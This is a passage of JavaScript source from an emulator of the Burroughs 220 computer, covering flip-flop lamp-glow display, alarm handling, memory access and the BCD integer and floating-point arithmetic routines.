to increment this.execClock in the caller AFTER setting new values in registers and flip-flops. This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.visible = (invisible ? false : true); this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = 0; // average lamp glow value }; /**************************************/ B220Processor.FlipFlop.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the average glow for the flip flop. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). For normal update, use 0; to freeze the current state, use 1. Returns the new average */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); if (this.visible) { this.glow = this.glow*(1.0-alpha) + this.value*alpha; } this.lastExecClock = this.p.execClock; return this.glow; }; /**************************************/ B220Processor.FlipFlop.prototype.set = function set(value) { /* Set the value of the FF. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = (value ? 1 : 0); if (this.visible) { this.updateLampGlow(0); } return value; }; /**************************************/ B220Processor.FlipFlop.prototype.flip = function flip() { /* Complement the value of the FF. Returns the new value */ return this.set(1-this.value); }; /*********************************************************************** * System Alarms * ***********************************************************************/ /**************************************/ B220Processor.prototype.setDigitCheck = function setDigitCheck(value) { /* Sets the Digit Check alarm */ if (!this.ALARMSW && !this.DIGITCHECKSW) { this.digitCheckAlarm.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setProgramCheck = function setProgramCheck(value) { /* Sets the Program Check alarm */ if (!this.ALARMSW) { this.ALT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setStorageCheck = function setStorageCheck(value) { /* Sets the Storage Check alarm */ if (!this.ALARMSW) { this.MET.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setMagneticTapeCheck = function setMagneticTapeCheck(value) { /* Sets the Magnetic Tape Check alarm */ if (!this.ALARMSW) { this.TAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setCardatronCheck = function setCardatronCheck(value) { /* Sets the Cardatron Check alarm */ if (!this.ALARMSW) { this.CRT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setPaperTapeCheck = function setPaperTapeCheck(value) { /* Sets the Paper Tape Check alarm */ if (!this.ALARMSW) { this.PAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setHighSpeedPrinterCheck = function setHighSpeedPrinterCheck(value) { /* Sets the High Speed Printer Check alarm */ if (!this.ALARMSW) { this.HAT.set(value); if (value) { this.setStop(); } } }; /*********************************************************************** * Memory Access * ***********************************************************************/ /**************************************/ B220Processor.prototype.readMemory = function readMemory() { /* Reads the contents of one word of memory into the IB register from the address in the E register. Sets the Storage Check alarm if the address is not valid. Returns the word fetched, or the current value of IB if invalid address */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); return this.IB.value; } else if (addr >= this.memorySize) { this.setStorageCheck(1); return this.IB.value; } else if (this.MEMORYLOCKOUTSW) { return this.IB.set(this.D.value); } else { return this.IB.set(this.MM[addr]); } }; /**************************************/ B220Processor.prototype.writeMemory = function writeMemory() { /* Stores one word of memory from the IB register to the address in the E register. Sets the Storage Check alarm if the address is not valid */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); } else if (addr >= this.memorySize) { this.setStorageCheck(1); } else if (this.MEMORYLOCKOUTSW) { this.D.set(this.IB.value); } else { this.MM[addr] = this.IB.value; } }; /*********************************************************************** * The 220 Adder and Arithmetic Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.bcdAdd = function bcdAdd(a, d, digits, complement, initialCarry) { /* Returns an unsigned, BCD addition of "a" and "d", producing "digits" of BCD result. Any higher-order digits and any overflow are discarded. Maximum capacity in Javascript (using IEEE 64-bit floating point) is 14 digits. On input, "complement" indicates whether 9s-complement addition should be performed; "initialCarry" indicates whether an initial carry of 1 should be applied to the adder. On output, this.CI is set from the final carry toggles of the addition and this.C10 will have the carry toggle. Further, this.Z will still have a copy of the sign (high-order) digit. Sets the Program Check alarm if non-decimal digits are encountered, but does not set the Overflow toggle */ var ad; // current augend (a) digit; var adder; // local copy of adder digit var am = a % B220Processor.pow2[digits*4]; // augend mantissa var carry = (initialCarry || 0) & 1;// local copy of carry toggle (CI1, CAT) var compl = complement || 0; // local copy of complement toggle var ct = carry; // local copy of carry register (CI1-16) var dd; // current addend (d) digit; var dm = d % B220Processor.pow2[digits*4]; // addend mantissa var shiftPower = B220Processor.pow2[(digits-1)*4]; // to position high-order digit var x; // digit counter // Loop through the digits for (x=0; x<digits; ++x) { // shift low-order augend digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC if (compl) { ad = 9-ad; } // Add the digits plus carry, complementing as necessary dd = dm % 0x10; this.Y.set(dd); // tests for FC adder = ad + dd + carry; // Decimal-correct the adder if (adder < 10) { carry = 0; } else { adder -= 10; carry = 1; } // Compute the carry toggle register (just for display) ct = (((ad & dd) | (ad & ct) | (dd & ct)) << 1) + carry; // Update the visible registers (for display only) this.Z.set(adder); // tests for FC this.C10.set(carry); this.CI.set(ct); this.SI.set(0x0F ^ ct); // just a guess as to the sum inverters // rotate the adder into the high-order digit am += adder*shiftPower; // shift the addend right to the next digit dm = (dm - dd)/0x10; } // for x return am; }; /**************************************/ B220Processor.prototype.clearAdd = function clearAdd(absolute) { /* After accessing memory, algebraically add the addend (IB) to zero. If "absolute" is true, then the sign-bit of the word from memory is forced to the subtract toggle. All values are BCD with the sign in the 11th digit position. Sets the Digit Check alarm as necessary */ var am = 0; // augend mantissa var dm; // addend mantissa var dSign; // addend sign this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000); if (absolute) { // force sign bit to SUT dSign = (dSign & 0x0E) | this.SUT.value; } else if (this.SUT.value) { // complement the sign bit dSign = dSign ^ 0x01; } am = this.bcdAdd(am, dm, 11); // Set toggles for display purposes and return the result this.DST.set(dSign%2); this.SGT.set(dSign%2); this.D.set(dSign*0x10000000000 + dm); this.A.set(dSign*0x10000000000 + am); }; /**************************************/ B220Processor.prototype.integerAdd = function integerAdd(absolute, toD) { /* After accessing memory, algebraically add the addend (IB) to the augend (A). If "absolute" is true, then the sign of the word from memory is forced to zero. If "toD" is false, the result will be left in A, and D will contain a copy of the word from memory with the three high-order bits of its sign set to zero. If "toD" is true, the result will be left in D, and A will not be altered, except than the three high-order bits of its sign digit will be set to zero. Note that if the value of the result is zero, its sign will be the original sign of A. All values are BCD with the sign in the 11th digit position. Sets the Overflow and Digit Check alarms as necessary */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm; // addend mantissa var dSign; // addend sign var sign; // local copy of sign toggle var timing = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we have overflow // or need to recomplement the result switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; timing += 0.060; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); if (toD) { this.D.set(am); this.A.set(this.A.value%0x20000000000); } else { this.D.set(dSign*0x10000000000 + dm); this.A.set(am); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.integerExtract = function integerExtract() { /* "Extract" digits from A according to the digit pattern in IB. If a pattern digit is even, then the corresponding digit in the value is set to zero. If the pattern digit is odd, then the corresponding value digit is not changed. Overflow is not possible, but a Digit Check alarm can occur */ var ad; // current value (A) digit; var am = this.A.value; // value mantissa var dd; // current pattern (D) digit; var dm; // pattern mantissa var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } // Loop through the 11 digits including signs dm = this.IB.value; for (x=0; x<11; ++x) { // shift low-order value digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC // shift low-order pattern digit into the adder dd = dm % 0x10; dm = (dm - dd)/0x10; this.Y.set(dd); // tests for FC if (dd%2) { // if extract digit is odd this.Z.set(ad); // keep the value digit } else { // otherwise, if it's even ad = 0; // clear the value digit this.Z.set(0); } // rotate the digit into the result am += ad*0x10000000000; } // for x // Set toggles for display purposes and return the result this.A.set(am); this.D.set(this.IB.value); this.opTime = 0.145; }; /**************************************/ B220Processor.prototype.integerMultiply = function integerMultiply() { /* Algebraically multiply the multiplicand (IB) by the multiplier (A), producing a 20-digit product in A and R. Final sign of R will be final sign of A. All values are BCD with the sign in the 11th digit position. Sets Forbidden- Combination stop as necessary. Overflow is not possible */ var ad; // current product (A) digit; var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of multiply cycles var dm; // multiplicand mantissa var dSign; // sign of multiplicand var rc; // dup of rd for add counting var rd; // current multipler (R) digit; var rm = am; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero this.R.set(0); return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; am = 0; // clear the local product (A) mantissa // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multipler digit, and between digits // shifting the product (in am and rm) one place to the right. After 10 digits, // we're done. The 220 probably did a combination of addition and subtraction, // depending on whether the current multiplier digit was >5, to minimize the // number of addition cycles. We don't care how long this takes internally, // the the following mechanization uses the simple way. for (x=0; x<10; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { // repeated addition am = this.bcdAdd(am, dm, 11, 0, 0); } ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x this.DST.set(dSign); this.SGT.set(sign); this.A.set(sign*0x10000000000 + am); this.R.set(sign*0x10000000000 + rm); this.D.set(dSign*0x10000000000 + dm); this.opTime = 0.090 + 0.005*count; }; /**************************************/ B220Processor.prototype.integerDivide = function integerDivide() { /* Algebraically divide the dividend (A & R) by the divisor (IB), producing a signed 10-digit quotient in A and the remainder in R. All values are BCD with the sign in the 11th digit position. Sets Digit Check alarm as necessary. If the magnitude of the divisor (IB) is less or equal to the magnitude of the dividend (A), Overflow is set and division terminates */ var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of divide cycles var dm; // divisor mantissa var dSign; // sign of divisior var rd; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (ignore sign) var rSign = (this.R.value - rm)/0x10000000000; // R register sign (restored later) var sign; // local copy of sign toggle (sign of quotient) var tSign = 1; // sign for timing count accumulation var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero this.R.set(aSign*0x10000000000 + rm); return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.DST.set(dSign); this.SGT.set(sign); this.SUT.set(1); // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient. Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, which is close to the way the 205 worked. The funny way that timing // for division could be calculated from the differences of alternate quotient // digits (see the Operational Characteristics manual, 5020A, August 1960, p.212) // suggests that something clever was going on with the 220 divide implementation. if (this.bcdAdd(dm, am, 11, 1, 1) < 0x10000000000) { this.OFT.set(1); this.A.set(aSign*0x10000000000 + am); this.R.set(rSign*0x10000000000 + rm); this.D.set(this.IB.value); this.opTime = 0.090; } else { for (x=0; x<10; ++x) { // First, shift A & R to the left one digit, with A1 shifting to ASGN rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10; am = am*0x10 + rd; // Now repeatedly subtract D from A until we would get underflow. rd = 0; while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++rd; count += tSign; } rm += rd; // move digit into quotient tSign = -tSign; } // for x this.A.set(sign*0x10000000000 + rm); // rotate final values in A & R this.R.set(aSign*0x10000000000 + am); this.D.set(dSign*0x10000000000 + dm); this.opTime = 3.805 + 0.060*count; } }; /**************************************/ B220Processor.prototype.floatingAdd = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = 0; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing var zeroed = false; // true if either operand normalizes to zero this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift D right if (dm == 0) { zeroed = true; sign = aSign; // result is value in A break; } } // Scale A until its exponent matches or the mantissa goes to zero. while (ax < dx) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right if (am == 0) { zeroed = true; am = dm; // result is value in D with adjusted sign ax = dx; dSign = 0; break; } } // Add the mantissas if (!zeroed) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); timing += 0.060; } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x100000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. this.OFT.set(1); sign = ax = dx = 0; } } else if (am == 0) { // mantissa is zero => result is zero ax = sign = 0; timing += 0.065; } else { // normalize the result as necessary while (am < 0x10000000) { if (ax > 0 && shifts < 8) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingAdd__WITH_ROUND = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ /* THIS IS AN EXPERIMENTAL VERSION THAT ROUNDS RESULTS */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; am *= 0x100; // insert two low-order rounding digits dm *= 0x100; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { if (++shifts < 8) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift right } else { sign = aSign; // result is value in A limiter = 0; break; } } // Scale A until its exponent matches or the mantissa goes to zero. while (ax < dx) { if (++shifts < 8) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { am = dm; // result is value in D with adjusted sign ax = dx; limiter = 0; break; } } // Add the mantissas if (shifts < 8) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 13, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 13, 1, 1); timing += 0.060; } } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x10000000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. limiter = 0; if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. this.OFT.set(1); sign = ax = dx = limiter = 0; } } else if (am == 0) { // mantissa is zero ax = sign = limiter = 0; timing += 0.065; } else { // normalize the result as necessary shifts = 0; while (am < 0x1000000000) { // NOTE: THIS INCLUDES THE ROUNDING DIGITS if (ax > 0) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. d = am%0x100; // get the rounding digits am = (am - d)/0x100; // scale back to 8 digits if (d >= 0x50) { // round required am = this.bcdAdd(1, am, 11, 0, 0); if (am >= 0x100000000) { ax = this.bcdAdd(1, ax, 3, 0, 0); // ignore exponent overflow, for now d = am%0x10; am = (am - d)/0x10; if (d >= 5) { // round again after scale right am = this.bcdAdd(1, am, 11, 0, 0); } } } this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingMultiply = function floatingMultiply() { /* Algebraically multiply the floating-point multiplicand in the IB register by the floating-point multiplier in the A register, producing a 18-digit product (16 mantissa + 2 exponent) in A and R. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets the Digit Check alarm as necessary */ var ad; // current product (A) digit; var ax; // product/multiplier (A) exponent var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx; // multiplicand exponent var dm; // multiplicand mantissa var dSign; // multiplicand sign var rc; // dup of rd for add counting var rd; // current multipler (R) digit; var rm = 0; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var timing = 0.085; // minimum instruction timing var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000) { // A is not normalized, so assume zero this.A.set(0); this.R.set(0); } else if (dm < 0x10000000) { // D is not normalized, so assume zero this.A.set(0); this.R.set(0); } else { sign = (aSign ^ dSign); rm = am; // shift A:08 to R:98, then shift R again right 1 am = 0; // result of shifting A to R dm *= 0x100; // circulate D two places left (D:22 is 0, so a simple shift left will do) x = this.bcdAdd(ax, dx, 3); // do exponent arithmetic into temp x ax = this.bcdAdd(0x50, x, 3, 1, 1);// subtract the exponent bias from the A exponent timing += 0.080; if (x >= 0x150) { // exponent overflow this.OFT.set(1); this.A.set(am); this.R.set(rm); } else if (x < 0x50) { // exponent underflow this.A.set(0); this.R.set(0); dm %= 0x100000000; } else { // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multipler digit, and between digits // shifting the product (in am and rm) one place to the right. After 8 digits, // we're done, except for normalization. for (x=0; x<8; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { am = this.bcdAdd(am, dm, 11, 0, 0); } // while rd ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x // Normalize the result as necessary. if (am >= 0x1000000000) { // Shift product two places right timing += 0.020; ad = am % 0x100; am = (am-ad)/0x100; rd = rm % 0x100; rm = (rm-rd)/0x100 + ad*0x100000000; } else if (ax > 0) { // Shift product one place right timing += 0.010; ad = am % 0x10; am = (am-ad)/0x10; rd = rm % 0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; ax = this.bcdAdd(0x01, ax, 3, 1, 1); // decrement exponent } else { // Exponent underflow: set R and the reconstructed A to zero. am = ax = rm = sign = 0; } // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(sign*0x10000000000 + rm); timing += 0.005*count; } // Set the registers and toggles for display this.SGT.set(sign); this.DST.set(dSign); this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingDivide = function floatingDivide() { /* Algebraically divide the 18-digit (16 mantissa + 2 exponent) floating- point dividend in the A & R registers by the floating-point divisor in the D register, producing a 9- or 10-digit quotient in the A & R registers and a 6- or 7-digit remainder in the low-order digits of the R register. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets the Digit Check alarm as necessary */ var ad = 0; // current remainder (A) digit var ax = 0; // dividend/quotient exponent var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx = 0; // divisor exponent var dm = 0; // divisor mantissa var dSign = 0; // divisor sign var rd = 0; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (drop sign) var rSign = (this.R.value-rm)/0x10000000000; // R register sign (restore later) var sign = 0; // local copy of sign toggle (sign of quotient) var timing = 0.085; // minimum instruction timing var tSign = 1; // sign for timing count accumulation var x = 0; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.SUT.set(1); ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000 && dm >= 0x10000000) { this.A.set(0); // A is not normalized but D is, quotient=0 this.R.set(0); } else if (dm < 0x10000000) { this.OFT.set(1); // D is not normalized, overflow (div 0) this.A.set(ax*0x100000000 + am); } else { // Add the exponent bias to the dividend exponent and check for underflow ax = this.bcdAdd(ax, 0x50, 3); timing += 0.085; if (ax < dx) { // Exponents differ by more than 50 -- underflow sign = 0; ax = this.bcdAdd(dx, ax, 3, 1, 1); this.A.set(0); this.R.set(0); } else { // Subtract the exponents and check for overflow ax = this.bcdAdd(dx, ax, 3, 1, 1); if (ax > 0x99) { this.OFT.set(1); sign = 0; this.A.set(am); } else { // Shift A+R 1 digit right (exponent adjustment occurs later ad = am%0x10; am = (am-ad)/0x10; rd = rm%0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient. Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, but we don't have sufficient technical details to know for sure. // The following is adapted from the 205 implementation. for (x=0; x<11; ++x) { // Repeatedly subtract D from A until we would get underflow. ad = 0; /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++ad; count += tSign; } // Shift A & R to the left one digit, accumulating the quotient digit in R rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10 + ad; // Shift into remainder except on last digit. if (x < 10) { am = am*0x10 + rd; } tSign = -tSign; } // for x /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Rotate the quotient and remainder for 10 digits to exchange registers for (x=0; x<10; ++x) { ad = am%0x10; rd = rm%0x10; rm = (rm - rd)/0x10 + ad*0x1000000000; am = (am - ad)/0x10 + rd*0x1000000000; } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 98, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ if (am >=0x1000000000 && ax == 0x99) { this.OFT.set(1); this.A.set(am); this.R.set(rSign*0x10000000000 + rm); } else { if (am < 0x1000000000) { // Normalize one digit to the right ad = am%0x10; am = (am - ad)/0x10; rm = (rm - rm%0x10)/0x10 + ad*0x1000000000; } else { // Normalize two digits to the right and adjust exponent ad = am%0x100; am = (am - ad)/0x100; rm = (rm - rm%0x100)/0x100 + ad*0x100000000; ax = this.bcdAdd(ax, 1, 3); } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s 